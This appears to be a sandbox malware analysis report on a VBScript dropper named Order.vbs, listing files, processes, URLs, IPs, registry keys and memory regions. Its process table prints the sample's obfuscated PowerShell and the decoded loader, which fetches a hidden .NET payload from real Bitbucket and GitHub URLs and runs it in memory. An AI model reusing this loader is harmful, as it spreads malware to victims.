Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Order.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage user DataBase, version 0x620, checksum 0x68e0ee62, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\json[1].json
|
JSON data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5xim2zri.xrv.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gbttndlk.5n2.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m1m3swds.k3s.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oiyygwzw.jro.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_scz0e1kg.jsg.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zksnyaie.usn.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
||
|
\Device\ConDrv
|
ISO-8859 text, with CRLF line terminators
|
dropped
|
There are 4 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#JwB0#Hg#d##u#GQ#cgBt#G0#c#Bn#Gs#LwBu#Gk#YQBt#C8#cwBk#GE#ZQBo#C8#cwBm#GU#cg#v#GI#c#Bh#Hk#awBz#C8#QQBL#Ek#UwBF#EE#VwBV#EU#SgBJ#C8#bQBv#GM#LgB0#G4#ZQB0#G4#bwBj#HI#ZQBz#HU#YgB1#Gg#d#Bp#Gc#LgB3#GE#cg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd
= [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe
$OWjuxD .exe -windowstyle hidden -exec
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient;
$shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try
{ return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417',
'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks
$links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);
$startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag);
$endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex
+= $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex,
$base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);
$type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]]
('txt.drmmpgk/niam/sdaeh/sfer/bpayks/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}"
.exe -windowstyle hidden -exec
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://raw.githubusercontent.com
|
unknown
|
|
|
|
https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417
|
185.166.143.48
|
|
|
|
https://raw.githubusercontent.com/IJEUWAESIKA/skyapb/refs/heads/main/kgpmmrd.txt
|
185.199.108.133
|
|
|
|
https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723
|
unknown
|
|
|
|
https://bitbucket.org
|
unknown
|
|
|
|
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
|
http://geoplugin.net/json.gp(cZ
|
unknown
|
||
|
https://bbuseruploads.s3.amazonaws.com
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://web-security-reports.services.atlassian.com/csp-report/bb-website
|
unknown
|
||
|
https://aka.ms/winsvr-2022-pshelpX
|
unknown
|
||
|
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV21C:
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
http://geoplugin.net/json.gp6
|
unknown
|
||
|
http://go.micros
|
unknown
|
||
|
https://dz8aopenkvv6s.cloudfront.net
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://geoplugin.net/json.gpSystem32
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
|
https://g.live.com/odclientsettings/Prod1C:
|
unknown
|
||
|
http://geoplugin.net/json.gp/C
|
unknown
|
||
|
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
|
unknown
|
||
|
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
|
https://cdn.cookielaw.org/
|
unknown
|
||
|
https://aui-cdn.atlassian.com/
|
unknown
|
||
|
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
|
unknown
|
||
|
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://bbuseruploads.s3.amazonaws.com/cbff8810-ace3-4466-81b1-12ba7827c90a/downloads/6b181c48-ea9d-
|
unknown
|
There are 25 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
s3-w.us-east-1.amazonaws.com
|
52.217.161.161
|
|
|
|
bitbucket.org
|
185.166.143.48
|
|
|
|
raw.githubusercontent.com
|
185.199.108.133
|
|
|
|
bbuseruploads.s3.amazonaws.com
|
unknown
|
|
|
|
bg.microsoft.map.fastly.net
|
199.232.214.172
|
||
|
geoplugin.net
|
178.237.33.50
|
||
|
ax-0001.ax-msedge.net
|
150.171.28.10
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
154.216.17.141
|
unknown
|
Seychelles
|
|
|
|
52.217.161.161
|
s3-w.us-east-1.amazonaws.com
|
United States
|
|
|
|
185.166.143.48
|
bitbucket.org
|
Germany
|
|
|
|
185.199.108.133
|
raw.githubusercontent.com
|
Netherlands
|
|
|
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-MBKA6A
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-MBKA6A
|
time
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
There are 7 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
DC5000
|
heap
|
page read and write
|
|
|
|
400000
|
remote allocation
|
page execute and read and write
|
|
|
|
2819F2FE000
|
heap
|
page read and write
|
||
|
1F505F85000
|
trusted library allocation
|
page read and write
|
||
|
218DA226000
|
heap
|
page read and write
|
||
|
28186F3E000
|
trusted library allocation
|
page read and write
|
||
|
1F500073000
|
trusted library allocation
|
page read and write
|
||
|
11BAF3E0000
|
trusted library allocation
|
page read and write
|
||
|
11BA9DC0000
|
heap
|
page read and write
|
||
|
1F504F16000
|
trusted library allocation
|
page read and write
|
||
|
11BAA713000
|
heap
|
page read and write
|
||
|
1F5054DF000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34350000
|
trusted library allocation
|
page read and write
|
||
|
11BAF3A0000
|
trusted library allocation
|
page read and write
|
||
|
218DA206000
|
heap
|
page read and write
|
||
|
28186FF1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34300000
|
trusted library allocation
|
page read and write
|
||
|
1F50040F000
|
trusted library allocation
|
page read and write
|
||
|
28185343000
|
heap
|
page read and write
|
||
|
281854E0000
|
heap
|
page read and write
|
||
|
D1B913F000
|
stack
|
page read and write
|
||
|
193B0FE000
|
unkown
|
page readonly
|
||
|
218DA210000
|
heap
|
page read and write
|
||
|
11BAF4EC000
|
heap
|
page read and write
|
||
|
3FD7EFE000
|
stack
|
page read and write
|
||
|
11BA9F29000
|
heap
|
page read and write
|
||
|
2819F580000
|
heap
|
page read and write
|
||
|
1F5003FB000
|
trusted library allocation
|
page read and write
|
||
|
1F50A355000
|
trusted library allocation
|
page read and write
|
||
|
D9E000
|
stack
|
page read and write
|
||
|
7FFD3417C000
|
trusted library allocation
|
page execute and read and write
|
||
|
218DA41D000
|
heap
|
page read and write
|
||
|
1F500EBB000
|
trusted library allocation
|
page read and write
|
||
|
11BA9EB4000
|
heap
|
page read and write
|
||
|
218DA20F000
|
heap
|
page read and write
|
||
|
218DA140000
|
heap
|
page read and write
|
||
|
2819F7E0000
|
heap
|
page read and write
|
||
|
193C8FE000
|
unkown
|
page readonly
|
||
|
28185309000
|
heap
|
page read and write
|
||
|
218DA237000
|
heap
|
page read and write
|
||
|
28186ED1000
|
trusted library allocation
|
page read and write
|
||
|
218DA219000
|
heap
|
page read and write
|
||
|
11BA9F13000
|
heap
|
page read and write
|
||
|
11BAF44C000
|
heap
|
page read and write
|
||
|
218DA219000
|
heap
|
page read and write
|
||
|
193C7F9000
|
stack
|
page read and write
|
||
|
218DA209000
|
heap
|
page read and write
|
||
|
DAB000
|
heap
|
page read and write
|
||
|
1F505575000
|
trusted library allocation
|
page read and write
|
||
|
1F500001000
|
trusted library allocation
|
page read and write
|
||
|
218DA21C000
|
heap
|
page read and write
|
||
|
2819F470000
|
heap
|
page read and write
|
||
|
11BAF41F000
|
heap
|
page read and write
|
||
|
218DBC70000
|
heap
|
page read and write
|
||
|
1F5055F7000
|
trusted library allocation
|
page read and write
|
||
|
7FFD342D0000
|
trusted library allocation
|
page read and write
|
||
|
281853C7000
|
heap
|
page read and write
|
||
|
2818532F000
|
heap
|
page read and write
|
||
|
7FFD34320000
|
trusted library allocation
|
page read and write
|
||
|
11BA9E00000
|
heap
|
page read and write
|
||
|
193BC7E000
|
stack
|
page read and write
|
||
|
11BAF740000
|
remote allocation
|
page read and write
|
||
|
9CC000
|
stack
|
page read and write
|
||
|
2818703B000
|
trusted library allocation
|
page read and write
|
||
|
1F5036BB000
|
trusted library allocation
|
page read and write
|
||
|
218DA237000
|
heap
|
page read and write
|
||
|
193C1FE000
|
stack
|
page read and write
|
||
|
1F5045C7000
|
trusted library allocation
|
page read and write
|
||
|
8CC000
|
stack
|
page read and write
|
||
|
1F500489000
|
trusted library allocation
|
page read and write
|
||
|
218DC0B7000
|
heap
|
page read and write
|
||
|
281853DA000
|
heap
|
page read and write
|
||
|
F80000
|
heap
|
page read and write
|
||
|
11BA9E74000
|
heap
|
page read and write
|
||
|
28186FEB000
|
trusted library allocation
|
page read and write
|
||
|
193C3FE000
|
unkown
|
page readonly
|
||
|
1F510011000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34390000
|
trusted library allocation
|
page read and write
|
||
|
218DA41D000
|
heap
|
page read and write
|
||
|
11BAAFA0000
|
trusted library section
|
page readonly
|
||
|
28186FFF000
|
trusted library allocation
|
page read and write
|
||
|
3FD80FD000
|
stack
|
page read and write
|
||
|
2818741A000
|
trusted library allocation
|
page read and write
|
||
|
1F5022BB000
|
trusted library allocation
|
page read and write
|
||
|
281873D9000
|
trusted library allocation
|
page read and write
|
||
|
1F505422000
|
trusted library allocation
|
page read and write
|
||
|
11BAA560000
|
trusted library section
|
page read and write
|
||
|
30BF000
|
stack
|
page read and write
|
||
|
1F508F55000
|
trusted library allocation
|
page read and write
|
||
|
1F510001000
|
trusted library allocation
|
page read and write
|
||
|
11BA9EB9000
|
heap
|
page read and write
|
||
|
218DA41A000
|
heap
|
page read and write
|
||
|
2819F377000
|
heap
|
page execute and read and write
|
||
|
218DA419000
|
heap
|
page read and write
|
||
|
7DF494050000
|
trusted library allocation
|
page execute and read and write
|
||
|
28185331000
|
heap
|
page read and write
|
||
|
38D81FE000
|
stack
|
page read and write
|
||
|
193B5FB000
|
stack
|
page read and write
|
||
|
1F5004BB000
|
trusted library allocation
|
page read and write
|
||
|
11BAA702000
|
heap
|
page read and write
|
||
|
C30000
|
heap
|
page read and write
|
||
|
11BAF4F3000
|
heap
|
page read and write
|
||
|
193BBFE000
|
unkown
|
page readonly
|
||
|
7FFD341A6000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F500462000
|
trusted library allocation
|
page read and write
|
||
|
2819F273000
|
heap
|
page read and write
|
||
|
31BF000
|
stack
|
page read and write
|
||
|
1F5003E8000
|
trusted library allocation
|
page read and write
|
||
|
2818740D000
|
trusted library allocation
|
page read and write
|
||
|
2819F34E000
|
heap
|
page read and write
|
||
|
11BAF3E4000
|
trusted library allocation
|
page read and write
|
||
|
11BA9E41000
|
heap
|
page read and write
|
||
|
281853DD000
|
heap
|
page read and write
|
||
|
193BCFE000
|
unkown
|
page readonly
|
||
|
11BAA71A000
|
heap
|
page read and write
|
||
|
D00000
|
heap
|
page read and write
|
||
|
218DA225000
|
heap
|
page read and write
|
||
|
2819F362000
|
heap
|
page read and write
|
||
|
38D863E000
|
stack
|
page read and write
|
||
|
7FFD34380000
|
trusted library allocation
|
page read and write
|
||
|
218DA214000
|
heap
|
page read and write
|
||
|
11BAF500000
|
heap
|
page read and write
|
||
|
11BAAFB0000
|
trusted library section
|
page readonly
|
||
|
1F500487000
|
trusted library allocation
|
page read and write
|
||
|
218DC0BB000
|
heap
|
page read and write
|
||
|
2C4D000
|
stack
|
page read and write
|
||
|
3FD83FB000
|
stack
|
page read and write
|
||
|
11BAA700000
|
heap
|
page read and write
|
||
|
1F5003E0000
|
trusted library allocation
|
page read and write
|
||
|
28185520000
|
trusted library allocation
|
page read and write
|
||
|
1F504E80000
|
trusted library allocation
|
page read and write
|
||
|
1F504260000
|
trusted library allocation
|
page read and write
|
||
|
193B8FE000
|
unkown
|
page readonly
|
||
|
28187566000
|
trusted library allocation
|
page read and write
|
||
|
11BAF50A000
|
heap
|
page read and write
|
||
|
218DA1BD000
|
heap
|
page read and write
|
||
|
D1B907E000
|
stack
|
page read and write
|
||
|
D1B8FFF000
|
stack
|
page read and write
|
||
|
218DA41A000
|
heap
|
page read and write
|
||
|
11BAAC40000
|
trusted library allocation
|
page read and write
|
||
|
D1B8F7F000
|
stack
|
page read and write
|
||
|
38D82F9000
|
stack
|
page read and write
|
||
|
193C37E000
|
stack
|
page read and write
|
||
|
218DA237000
|
heap
|
page read and write
|
||
|
7FFD34180000
|
trusted library allocation
|
page execute and read and write
|
||
|
11BAF502000
|
heap
|
page read and write
|
||
|
1F5018BB000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34260000
|
trusted library allocation
|
page read and write
|
||
|
218DC0B0000
|
heap
|
page read and write
|
||
|
7FFD342C0000
|
trusted library allocation
|
page read and write
|
||
|
28187035000
|
trusted library allocation
|
page read and write
|
||
|
11BA9E59000
|
heap
|
page read and write
|
||
|
1F50578E000
|
trusted library allocation
|
page read and write
|
||
|
DA0000
|
heap
|
page read and write
|
||
|
193B4FE000
|
unkown
|
page readonly
|
||
|
193B7FD000
|
stack
|
page read and write
|
||
|
193B3FB000
|
stack
|
page read and write
|
||
|
218DA20D000
|
heap
|
page read and write
|
||
|
28187571000
|
trusted library allocation
|
page read and write
|
||
|
11BAF6D0000
|
trusted library allocation
|
page read and write
|
||
|
11BAAF70000
|
trusted library section
|
page readonly
|
||
|
1F500424000
|
trusted library allocation
|
page read and write
|
||
|
11BA9EA0000
|
heap
|
page read and write
|
||
|
33BE000
|
stack
|
page read and write
|
||
|
28186EC0000
|
heap
|
page execute and read and write
|
||
|
2818555E000
|
heap
|
page read and write
|
||
|
11BAF3B0000
|
trusted library allocation
|
page read and write
|
||
|
D1B94BF000
|
stack
|
page read and write
|
||
|
281852F6000
|
heap
|
page read and write
|
||
|
281852EC000
|
heap
|
page read and write
|
||
|
11BAF454000
|
heap
|
page read and write
|
||
|
218DA1F7000
|
heap
|
page read and write
|
||
|
7FFD340C2000
|
trusted library allocation
|
page read and write
|
||
|
38D930C000
|
stack
|
page read and write
|
||
|
F70000
|
heap
|
page read and write
|
||
|
2819F550000
|
heap
|
page execute and read and write
|
||
|
28186FEE000
|
trusted library allocation
|
page read and write
|
||
|
38D918D000
|
stack
|
page read and write
|
||
|
2818536D000
|
heap
|
page read and write
|
||
|
E2C000
|
heap
|
page read and write
|
||
|
218DA237000
|
heap
|
page read and write
|
||
|
2819F359000
|
heap
|
page read and write
|
||
|
193CEFE000
|
unkown
|
page readonly
|
||
|
1F50AD55000
|
trusted library allocation
|
page read and write
|
||
|
11BAF6F0000
|
trusted library allocation
|
page read and write
|
||
|
28186FE8000
|
trusted library allocation
|
page read and write
|
||
|
193C2FE000
|
unkown
|
page readonly
|
||
|
11BAA615000
|
heap
|
page read and write
|
||
|
218DA1E9000
|
heap
|
page read and write
|
||
|
193B1FE000
|
stack
|
page read and write
|
||
|
11BB0000000
|
heap
|
page read and write
|
||
|
11BAF6E0000
|
trusted library allocation
|
page read and write
|
||
|
11BAA71A000
|
heap
|
page read and write
|
||
|
2A8B000
|
stack
|
page read and write
|
||
|
193CE7E000
|
stack
|
page read and write
|
||
|
38D86BE000
|
stack
|
page read and write
|
||
|
38D833E000
|
stack
|
page read and write
|
||
|
7FFD343B0000
|
trusted library allocation
|
page read and write
|
||
|
193C47E000
|
stack
|
page read and write
|
||
|
